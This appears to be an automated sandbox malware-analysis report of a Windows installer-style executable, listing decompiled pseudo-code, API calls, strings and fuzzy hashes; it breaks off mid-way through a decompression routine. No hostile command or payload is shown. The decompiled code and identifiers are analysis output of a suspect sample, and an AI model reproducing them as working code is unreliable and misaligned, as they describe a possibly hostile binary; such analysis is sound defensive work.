                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID: Called with incorrect token$wrong hex string
                                      • API String ID: 1617791916-2242125364
                                      • Opcode ID: a6a90ffcd8a10080e9a710f7c77a96b48df0c0801f71291b6a37521628043c54
                                      • Instruction ID: f63ccaa0d6a4ec303be1de1ccf0c44d71839b61e384b211fdb8a17e3d3c16ee2
                                      • Opcode Fuzzy Hash: a6a90ffcd8a10080e9a710f7c77a96b48df0c0801f71291b6a37521628043c54
                                      • Instruction Fuzzy Hash: 3B4151B4D04249EFEB01CFA4C885BAEBBB1FF45385F108459F90997245D7359A80CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 74%
                                      			E00402012() {
                                      				void* _t44;
                                      				intOrPtr* _t48;
                                      				intOrPtr* _t50;
                                      				intOrPtr* _t52;
                                      				intOrPtr* _t54;
                                      				signed int _t58;
                                      				intOrPtr* _t59;
                                      				intOrPtr* _t62;
                                      				intOrPtr* _t64;
                                      				intOrPtr* _t66;
                                      				intOrPtr* _t69;
                                      				intOrPtr* _t71;
                                      				int _t75;
                                      				signed int _t81;
                                      				intOrPtr* _t88;
                                      				void* _t95;
                                      				void* _t96;
                                      				void* _t100;
                                      
                                      				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                                      				_t96 = E004029E8(0xffffffdf);
                                      				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                                      				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                                      				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                                      				if(E0040548B(_t96) == 0) {
                                      					E004029E8(0x21);
                                      				}
                                      				_t44 = _t100 + 8;
                                      				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
                                      				if(_t44 < _t75) {
                                      					L13:
                                      					 *((intOrPtr*)(_t100 - 4)) = 1;
                                      					_push(0xfffffff0);
                                      				} else {
                                      					_t48 =  *((intOrPtr*)(_t100 + 8));
                                      					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
                                      					if(_t95 >= _t75) {
                                      						_t52 =  *((intOrPtr*)(_t100 + 8));
                                      						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                      						_t54 =  *((intOrPtr*)(_t100 + 8));
                                      						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                                      						_t81 =  *(_t100 - 0x14);
                                      						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                      						if(_t58 != 0) {
                                      							_t88 =  *((intOrPtr*)(_t100 + 8));
                                      							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                      							_t81 =  *(_t100 - 0x14);
                                      						}
                                      						_t59 =  *((intOrPtr*)(_t100 + 8));
                                      						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                      						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                                      							_t71 =  *((intOrPtr*)(_t100 + 8));
                                      							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                                      						}
                                      						_t62 =  *((intOrPtr*)(_t100 + 8));
                                      						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                      						_t64 =  *((intOrPtr*)(_t100 + 8));
                                      						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                      						if(_t95 >= _t75) {
                                      							_t95 = 0x80004005;
                                      							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409370, 0x400) != 0) {
                                      								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                                      								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409370, 1);
                                      							}
                                      						}
                                      						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                                      						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                      					}
                                      					_t50 =  *((intOrPtr*)(_t100 + 8));
                                      					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                      					if(_t95 >= _t75) {
                                      						_push(0xfffffff4);
                                      					} else {
                                      						goto L13;
                                      					}
                                      				}
                                      				E00401423();
                                      				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t100 - 4));
                                      				return 0;
                                      			}






















                                      APIs
                                      • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409370,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID: C:\Users\user\AppData\Local\Temp
                                      • API String ID: 123533781-501415292
                                      • Opcode ID: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                      • Instruction ID: 24f6ed1ac1c0c168ca35b22597f39d8cd9e85fbc7861a3d68fdd8e416dd3802a
                                      • Opcode Fuzzy Hash: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                                      • Instruction Fuzzy Hash: E2414DB5A00104AFCB00DFA4CD89E9E7BB9EF49354B20416AF505EB2E1DA79ED41CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,00000000,10010D64,-00000328,?,?,?), ref: 10013A4B
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 10013A54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 4b3d0209395e56c5d6677d421284d7fb1a9679e6174efec775dd536027971d7d
                                      • Instruction ID: c225365c7cc3228adce3e5a5af9b1b93b9fbbde98a32bce73f476e71b87c6d18
                                      • Opcode Fuzzy Hash: 4b3d0209395e56c5d6677d421284d7fb1a9679e6174efec775dd536027971d7d
                                      • Instruction Fuzzy Hash: D5B09231044218EBEB022FE1EC49B583FA8EB0E762F008010F60D84060CB72A4908AA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 39%
                                      			E00402630(char __ebx, char* __edi, char* __esi) {
                                      				void* _t19;
                                      
                                      				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                                      					E00405889(__edi, _t6);
                                      					_push(_t19 - 0x178);
                                      					_push(__esi);
                                      					E0040592B();
                                      				} else {
                                      					 *__edi = __ebx;
                                      					 *__esi = __ebx;
                                      					 *((intOrPtr*)(_t19 - 4)) = 1;
                                      				}
                                      				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t19 - 4));
                                      				return 0;
                                      			}





                                      APIs
                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID:
                                      • API String ID: 1974802433-0
                                      • Opcode ID: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                      • Instruction ID: 00d369c81b6f5d5ac2b66fc3ece6c10e84ddf32e85f5a3588956fe302b8fe543
                                      • Opcode Fuzzy Hash: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                                      • Instruction Fuzzy Hash: 18F0A0726081009EE700EBB59949EFEB768DF21324F6045BBF111B20C1C3B88946DA2A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction ID: 69259bdbea72c9186f3c35a85f2e28a7e646cd935bd3354b28d9734df18745cd
                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction Fuzzy Hash: 84C16F322054D309EB4DC639C43413EBAE2EB927F1317476ED4B6DB1DAEF20D9649620
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction ID: c3a932e525ac3d404fea8d8956a8b4b333aa6e073ad5b9c40615c31299dff31b
                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction Fuzzy Hash: D1C173332055D30AEB5DC639C43403EBAE2AB926F1317576DD8B6DB5D9EF20C924E620
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 79%
                                      			E00406043(signed int __ebx, signed int* __esi) {
                                      				signed int _t396;
                                      				signed int _t425;
                                      				signed int _t442;
                                      				signed int _t443;
                                      				signed int* _t446;
                                      				void* _t448;
                                      
                                      				L0:
                                      				while(1) {
                                      					L0:
                                      					_t446 = __esi;
                                      					_t425 = __ebx;
                                      					if( *(_t448 - 0x34) == 0) {
                                      						break;
                                      					}
                                      					L55:
                                      					__eax =  *(__ebp - 0x38);
                                      					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                      					__ecx = __ebx;
                                      					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                      					__ebx = __ebx + 8;
                                      					while(1) {
                                      						L56:
                                      						if(__ebx < 0xe) {
                                      							goto L0;
                                      						}
                                      						L57:
                                      						__eax =  *(__ebp - 0x40);
                                      						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                      						__ecx = __eax;
                                      						__esi[1] = __eax;
                                      						__ecx = __eax & 0x0000001f;
                                      						if(__cl > 0x1d) {
                                      							L9:
                                      							_t443 = _t442 | 0xffffffff;
                                      							 *_t446 = 0x11;
                                      							L10:
                                      							_t446[0x147] =  *(_t448 - 0x40);
                                      							_t446[0x146] = _t425;
                                      							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                      							L11:
                                      							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                      							_t446[0x26ea] =  *(_t448 - 0x30);
                                      							E004067B2( *(_t448 + 8));
                                      							return _t443;
                                      						}
                                      						L58:
                                      						__eax = __eax & 0x000003e0;
                                      						if(__eax > 0x3a0) {
                                      							goto L9;
                                      						}
                                      						L59:
                                      						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                      						__ebx = __ebx - 0xe;
                                      						_t94 =  &(__esi[2]);
                                      						 *_t94 = __esi[2] & 0x00000000;
                                      						 *__esi = 0xc;
                                      						while(1) {
                                      							L60:
                                      							__esi[1] = __esi[1] >> 0xa;
                                      							__eax = (__esi[1] >> 0xa) + 4;
                                      							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                      								goto L68;
                                      							}
                                      							L61:
                                      							while(1) {
                                      								L64:
                                      								if(__ebx >= 3) {
                                      									break;
                                      								}
                                      								L62:
                                      								if( *(__ebp - 0x34) == 0) {
                                      									goto L182;
                                      								}
                                      								L63:
                                      								__eax =  *(__ebp - 0x38);
                                      								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                      								__ecx = __ebx;
                                      								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                      								__ebx = __ebx + 8;
                                      							}
                                      							L65:
                                      							__ecx = __esi[2];
                                      							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                      							__ebx = __ebx - 3;
                                      							_t108 = __ecx + 0x407374; // 0x121110
                                      							__ecx =  *_t108;
                                      							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                      							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                      							__ecx = __esi[1];
                                      							__esi[2] = __esi[2] + 1;
                                      							__eax = __esi[2];
                                      							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                      							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                      								goto L64;
                                      							}
                                      							L66:
                                      							while(1) {
                                      								L68:
                                      								if(__esi[2] >= 0x13) {
                                      									break;
                                      								}
                                      								L67:
                                      								_t119 = __esi[2] + 0x407374; // 0x4000300
                                      								__eax =  *_t119;
                                      								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                      								_t126 =  &(__esi[2]);
                                      								 *_t126 = __esi[2] + 1;
                                      							}
                                      							L69:
                                      							__ecx = __ebp - 8;
                                      							__edi =  &(__esi[0x143]);
                                      							 &(__esi[0x148]) =  &(__esi[0x144]);
                                      							__eax = 0;
                                      							 *(__ebp - 8) = 0;
                                      							__eax =  &(__esi[3]);
                                      							 *__edi = 7;
                                      							__eax = E0040681A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                      							if(__eax != 0) {
                                      								L72:
                                      								 *__esi = 0x11;
                                      								while(1) {
                                      									L180:
                                      									_t396 =  *_t446;
                                      									if(_t396 > 0xf) {
                                      										break;
                                      									}
                                      									L1:
                                      									switch( *((intOrPtr*)(_t396 * 4 +  &M00406772))) {
                                      										case 0:
                                      											L101:
                                      											__eax = __esi[4] & 0x000000ff;
                                      											__esi[3] = __esi[4] & 0x000000ff;
                                      											__eax = __esi[5];
                                      											__esi[2] = __esi[5];
                                      											 *__esi = 1;
                                      											goto L102;
                                      										case 1:
                                      											L102:
                                      											__eax = __esi[3];
                                      											while(1) {
                                      												L105:
                                      												__eflags = __ebx - __eax;
                                      												if(__ebx >= __eax) {
                                      													break;
                                      												}
                                      												L103:
                                      												__eflags =  *(__ebp - 0x34);
                                      												if( *(__ebp - 0x34) == 0) {
                                      													goto L182;
                                      												}
                                      												L104:
                                      												__ecx =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                      												__ecx = __ebx;
                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                      												__ebx = __ebx + 8;
                                      												__eflags = __ebx;
                                      											}
                                      											L106:
                                      											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                      											__eax = __eax &  *(__ebp - 0x40);
                                      											__ecx = __esi[2];
                                      											__eax = __esi[2] + __eax * 4;
                                      											__ecx =  *(__eax + 1) & 0x000000ff;
                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                      											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                      											__ecx =  *__eax & 0x000000ff;
                                      											__eflags = __ecx;
                                      											if(__ecx != 0) {
                                      												L108:
                                      												__eflags = __cl & 0x00000010;
                                      												if((__cl & 0x00000010) == 0) {
                                      													L110:
                                      													__eflags = __cl & 0x00000040;
                                      													if((__cl & 0x00000040) == 0) {
                                      														goto L125;
                                      													}
                                      													L111:
                                      													__eflags = __cl & 0x00000020;
                                      													if((__cl & 0x00000020) == 0) {
                                      														goto L9;
                                      													}
                                      													L112:
                                      													 *__esi = 7;
                                      													goto L180;
                                      												}
                                      												L109:
                                      												__esi[2] = __ecx;
                                      												__esi[1] = __eax;
                                      												 *__esi = 2;
                                      												goto L180;
                                      											}
                                      											L107:
                                      											__esi[2] = __eax;
                                      											 *__esi = 6;
                                      											goto L180;
                                      										case 2:
                                      											L113:
                                      											__eax = __esi[2];
                                      											while(1) {
                                      												L116:
                                      												__eflags = __ebx - __eax;
                                      												if(__ebx >= __eax) {
                                      													break;
                                      												}
                                      												L114:
                                      												__eflags =  *(__ebp - 0x34);
                                      												if( *(__ebp - 0x34) == 0) {
                                      													goto L182;
                                      												}
                                      												L115:
                                      												__ecx =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                      												__ecx = __ebx;
                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                      												__ebx = __ebx + 8;
                                      												__eflags = __ebx;
                                      											}
                                      											L117:
                                      											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                      											__esi[1] = __esi[1] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                      											__ecx = __eax;
                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                      											__ebx = __ebx - __eax;
                                      											__eflags = __ebx;
                                      											__eax = __esi[4] & 0x000000ff;
                                      											__esi[3] = __esi[4] & 0x000000ff;
                                      											__eax = __esi[6];
                                      											__esi[2] = __esi[6];
                                      											 *__esi = 3;
                                      											goto L118;
                                      										case 3:
                                      											L118:
                                      											__eax = __esi[3];
                                      											while(1) {
                                      												L121:
                                      												__eflags = __ebx - __eax;
                                      												if(__ebx >= __eax) {
                                      													break;
                                      												}
                                      												L119:
                                      												__eflags =  *(__ebp - 0x34);
                                      												if( *(__ebp - 0x34) == 0) {
                                      													goto L182;
                                      												}
                                      												L120:
                                      												__ecx =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                      												__ecx = __ebx;
                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                      												__ebx = __ebx + 8;
                                      												__eflags = __ebx;
                                      											}
                                      											L122:
                                      											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                      											__eax = __eax &  *(__ebp - 0x40);
                                      											__ecx = __esi[2];
                                      											__eax = __esi[2] + __eax * 4;
                                      											__ecx =  *(__eax + 1) & 0x000000ff;
                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                      											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                      											__ecx =  *__eax & 0x000000ff;
                                      											__eflags = __cl & 0x00000010;
                                      											if((__cl & 0x00000010) == 0) {
                                      												L124:
                                      												__eflags = __cl & 0x00000040;
                                      												if((__cl & 0x00000040) != 0) {
                                      													goto L9;
                                      												}
                                      												L125:
                                      												__esi[3] = __ecx;
                                      												__ecx =  *(__eax + 2) & 0x0000ffff;
                                      												__esi[2] = __eax;
                                      												goto L180;
                                      											}
                                      											L123:
                                      											__esi[2] = __ecx;
                                      											__esi[3] = __eax;
                                      											 *__esi = 4;
                                      											goto L180;
                                      										case 4:
                                      											L126:
                                      											__eax = __esi[2];
                                      											while(1) {
                                      												L129:
                                      												__eflags = __ebx - __eax;
                                      												if(__ebx >= __eax) {
                                      													break;
                                      												}
                                      												L127:
                                      												__eflags =  *(__ebp - 0x34);
                                      												if( *(__ebp - 0x34) == 0) {
                                      													goto L182;
                                      												}
                                      												L128:
                                      												__ecx =  *(__ebp - 0x38);
                                      												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                      												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                      												__ecx = __ebx;
                                      												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                      												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                      												__ebx = __ebx + 8;
                                      												__eflags = __ebx;
                                      											}
                                      											L130:
                                      											 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                      											__esi[3] = __esi[3] + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                      											__ecx = __eax;
                                      											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                      											__ebx = __ebx - __eax;
                                      											__eflags = __ebx;
                                      											 *__esi = 5;
                                      											goto L131;
                                      										case 5:
                                      											L131:
                                      											__eax =  *(__ebp - 0x30);
                                      											__edx = __esi[3];
                                      											__eax = __eax - __esi;
                                      											__ecx = __eax - __esi - 0x1ba0;
                                      											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                      											if(__eax - __esi - 0x1ba0 >= __edx) {
                                      												__ecx = __eax;
                                      												__ecx = __eax - __edx;
                                      												__eflags = __ecx;
                                      											} else {
                                      												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                      												__ecx = __esi[0x26e8] - __edx - __esi;
                                      												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                      											}
                                      											__eflags = __esi[1];
                                      											 *(__ebp - 0x20) = __ecx;
                                      											if(__esi[1] != 0) {
                                      												L135:
                                      												__edi =  *(__ebp - 0x2c);
                                      												do {
                                      													L136:
                                      													__eflags = __edi;
                                      													if(__edi != 0) {
                                      														goto L152;
                                      													}
                                      													L137:
                                      													__edi = __esi[0x26e8];
                                      													__eflags = __eax - __edi;
                                      													if(__eax != __edi) {
                                      														L143:
                                      														__esi[0x26ea] = __eax;
                                      														__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                      														__eax = __esi[0x26ea];
                                      														__ecx = __esi[0x26e9];
                                      														__eflags = __eax - __ecx;
                                      														 *(__ebp - 0x30) = __eax;
                                      														if(__eax >= __ecx) {
                                      															__edi = __esi[0x26e8];
                                      															__edi = __esi[0x26e8] - __eax;
                                      															__eflags = __edi;
                                      														} else {
                                      															__ecx = __ecx - __eax;
                                      															__edi = __ecx - __eax - 1;
                                      														}
                                      														__edx = __esi[0x26e8];
                                      														__eflags = __eax - __edx;
                                      														 *(__ebp - 8) = __edx;
                                      														if(__eax == __edx) {
                                      															__edx =  &(__esi[0x6e8]);
                                      															__eflags = __ecx - __edx;
                                      															if(__ecx != __edx) {
                                      																__eax = __edx;
                                      																__eflags = __eax - __ecx;
                                      																 *(__ebp - 0x30) = __eax;
                                      																if(__eax >= __ecx) {
                                      																	__edi =  *(__ebp - 8);
                                      																	__edi =  *(__ebp - 8) - __eax;
                                      																	__eflags = __edi;
                                      																} else {
                                      																	__ecx = __ecx - __eax;
                                      																	__edi = __ecx;
                                      																}
                                      															}
                                      														}
                                      														__eflags = __edi;
                                      														if(__edi == 0) {
                                      															goto L183;
                                      														} else {
                                      															goto L152;
                                      														}
                                      													}
                                      													L138:
                                      													__ecx = __esi[0x26e9];
                                      													__edx =  &(__esi[0x6e8]);
                                      													__eflags = __ecx - __edx;
                                      													if(__ecx == __edx) {
                                      														goto L143;
                                      													}
                                      													L139:
                                      													__eax = __edx;
                                      													__eflags = __eax - __ecx;
                                      													if(__eax >= __ecx) {
                                      														__edi = __edi - __eax;
                                      														__eflags = __edi;
                                      													} else {
                                      														__ecx = __ecx - __eax;
                                      														__edi = __ecx;
                                      													}
                                      													__eflags = __edi;
                                      													if(__edi == 0) {
                                      														goto L143;
                                      													}
                                      													L152:
                                      													__ecx =  *(__ebp - 0x20);
                                      													 *__eax =  *__ecx;
                                      													__eax = __eax + 1;
                                      													__ecx = __ecx + 1;
                                      													__edi = __edi - 1;
                                      													__eflags = __ecx - __esi[0x26e8];
                                      													 *(__ebp - 0x30) = __eax;
                                      													 *(__ebp - 0x20) = __ecx;
                                      													 *(__ebp - 0x2c) = __edi;
                                      													if(__ecx == __esi[0x26e8]) {
                                      														__ecx =  &(__esi[0x6e8]);
                                      														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                      													}
                                      													_t357 =  &(__esi[1]);
                                      													 *_t357 = __esi[1] - 1;
                                      													__eflags =  *_t357;
                                      												} while ( *_t357 != 0);
                                      											}
                                      											goto L23;
                                      										case 6:
                                      											L156:
                                      											__eax =  *(__ebp - 0x2c);
                                      											__edi =  *(__ebp - 0x30);
                                      											__eflags = __eax;
                                      											if(__eax != 0) {
                                      												L172:
                                      												__cl = __esi[2];
                                      												 *__edi = __cl;
                                      												__edi = __edi + 1;
                                      												__eax = __eax - 1;
                                      												 *(__ebp - 0x30) = __edi;
                                      												 *(__ebp - 0x2c) = __eax;
                                      												goto L23;
                                      											}
                                      											L157:
                                      											__ecx = __esi[0x26e8];
                                      											__eflags = __edi - __ecx;
                                      											if(__edi != __ecx) {
                                      												L163:
                                      												__esi[0x26ea] = __edi;
                                      												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                      												__edi = __esi[0x26ea];
                                      												__ecx = __esi[0x26e9];
                                      												__eflags = __edi - __ecx;
                                      												 *(__ebp - 0x30) = __edi;
                                      												if(__edi >= __ecx) {
                                      													__eax = __esi[0x26e8];
                                      													__eax = __esi[0x26e8] - __edi;
                                      													__eflags = __eax;
                                      												} else {
                                      													__ecx = __ecx - __edi;
                                      													__eax = __ecx - __edi - 1;
                                      												}
                                      												__edx = __esi[0x26e8];
                                      												__eflags = __edi - __edx;
                                      												 *(__ebp - 8) = __edx;
                                      												if(__edi == __edx) {
                                      													__edx =  &(__esi[0x6e8]);
                                      													__eflags = __ecx - __edx;
                                      													if(__ecx != __edx) {
                                      														__edi = __edx;
                                      														__eflags = __edi - __ecx;
                                      														 *(__ebp - 0x30) = __edi;
                                      														if(__edi >= __ecx) {
                                      															__eax =  *(__ebp - 8);
                                      															__eax =  *(__ebp - 8) - __edi;
                                      															__eflags = __eax;
                                      														} else {
                                      															__ecx = __ecx - __edi;
                                      															__eax = __ecx;
